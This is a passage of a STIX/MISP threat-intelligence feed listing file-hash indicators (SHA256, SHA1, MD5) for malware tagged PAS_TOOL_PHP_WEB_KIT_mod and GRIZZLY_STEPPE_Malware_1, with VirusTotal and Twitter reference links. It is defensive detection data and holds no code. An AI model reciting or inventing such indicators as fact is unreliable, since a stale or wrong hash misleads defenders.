|
|
"id": "indicator--5867aac0-292c-445a-9f0d-419c950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:28.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:28.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '324eafb0da0943d2f83be775bfb58646765712642a4ed1ece1a27eeec65ad086']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:28Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac1-e534-40a9-8f8f-494a950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:29.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:29.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'edd14d44423bfd37f213906fbd3057f793e71cad5b11832375c98a421621d1d0']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:29Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac1-921c-4a4f-a662-40c0950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:29.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:29.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '64ad97ddebc2f0e95b03b56cb2fff1c2c494d2c417c84572be09ae5794638f19']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:29Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac2-f4a0-4d76-8691-48ee950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:30.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:30.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'cec64faea1a318d599039d5d84bd73939e88814fbbbacd0b36c7372ab2415ddb']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:30Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac2-ed84-4af7-acad-4b2a950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:30.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:30.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '0fb3367b73539f37ce4c28287ea6587cc846f70723f1fad3793704f8d8adb6e6']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:30Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac3-6e80-433a-91b3-4f15950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:31.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:31.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:31Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac4-9b2c-41cd-b2b0-4222950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:32.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:32.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '9eaed1ce36dfac5ced34b5205b8e21dc49d328177336c0b0c9aee89760a45422']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:32Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac4-1264-42fd-859e-4841950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:32.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:32.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '7c3ddada48fbd31ee2cf3ecd9ed1ec73a9bdb9881ccbbeaa7bfbc43b315af501']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:32Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac5-1b88-42ae-805d-40a4950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:33.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:33.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac6-f56c-4213-b3f8-4585950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:34.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:34.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'bbe4ea94d637978719a16cb49ad7a5e15bf30e81c9dd6c7c17a4139184dabf3b']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac6-f834-4883-86bf-49f4950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:34.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:34.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '4b67a97f89b92a25dfd52e369a363a877b3cb146fd0e18e8d638a04e52f9764b']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac7-95c0-462e-bc38-47f3950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:35.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:35.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '31d8af71cbe74194b58a89f17109c44b81f45ea724719b0556bb46c9e1f04288']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:35Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aaef-e408-43a9-a5c6-4bb0950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:56:15.000Z",
|
|
|
|
"modified": "2016-12-31T12:56:15.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '043d24f7635ddd2d90a804f1b2f3248d44ec19073af8e0c76cd49a172330985d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:56:15Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aaef-416c-45e6-9f42-49be950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:56:15.000Z",
|
|
|
|
"modified": "2016-12-31T12:56:15.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:56:15Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab00-a5fc-4109-95e5-477a950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:56:32.000Z",
|
|
|
|
"modified": "2016-12-31T12:56:32.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:56:32Z",
|
|
|
|
"last_observed": "2016-12-31T12:56:32Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab00-a5fc-4109-95e5-477a950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab00-a5fc-4109-95e5-477a950d210f",
|
|
|
|
"value": "https://twitter.com/cyb3rops/status/814769499555659776"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab3e-d314-452e-9571-437202de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:34.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:34.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '9cb7716d83c0d06ab356bdfa52def1af64bc5210']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab3e-201c-47d1-8679-463a02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:34.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:34.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e",
|
|
|
|
"pattern": "[file:hashes.MD5 = '81f1af277010cb78755f08dfcc379ca6']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab3f-5450-4736-9af6-466902de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:35.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:35.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:35Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:35Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab3f-5450-4736-9af6-466902de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab3f-5450-4736-9af6-466902de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e/analysis/1483145855/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab40-b8e0-43b2-a07a-4c9902de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:36.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:36.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: 043d24f7635ddd2d90a804f1b2f3248d44ec19073af8e0c76cd49a172330985d",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '541d3721705aee0925488a3c2bc4155d1bc07644']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:36Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab40-df2c-4b8b-a450-42a702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:36.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:36.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: 043d24f7635ddd2d90a804f1b2f3248d44ec19073af8e0c76cd49a172330985d",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'c6ba492461f9e437e66b920b0418971d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:36Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab41-ef38-4409-a401-434502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:37.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:37.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:37Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:37Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab41-ef38-4409-a401-434502de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab41-ef38-4409-a401-434502de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/043d24f7635ddd2d90a804f1b2f3248d44ec19073af8e0c76cd49a172330985d/analysis/1482735244/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab41-18ec-4589-8c03-468e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:37.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:37.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 31d8af71cbe74194b58a89f17109c44b81f45ea724719b0556bb46c9e1f04288",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '5e8d0fb775779f42c58f10e1e805d31b094d318a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:37Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab42-0f20-42e5-b3a1-45d702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:38.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:38.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 31d8af71cbe74194b58a89f17109c44b81f45ea724719b0556bb46c9e1f04288",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'e9e50ac57bd6972ac0bc8a4d207c9be8']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:38Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab43-eca4-4951-86b7-4b6b02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:39.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:39.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:39Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:39Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab43-eca4-4951-86b7-4b6b02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab43-eca4-4951-86b7-4b6b02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/31d8af71cbe74194b58a89f17109c44b81f45ea724719b0556bb46c9e1f04288/analysis/1479291303/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab43-6134-4a87-8706-4c8702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:39.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:39.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 4b67a97f89b92a25dfd52e369a363a877b3cb146fd0e18e8d638a04e52f9764b",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '1b1d2b405b5822cad009ca78a06508d1f904e04d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:39Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab44-3338-4e84-ac8c-454102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:40.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:40.000Z",
|
|
|
|
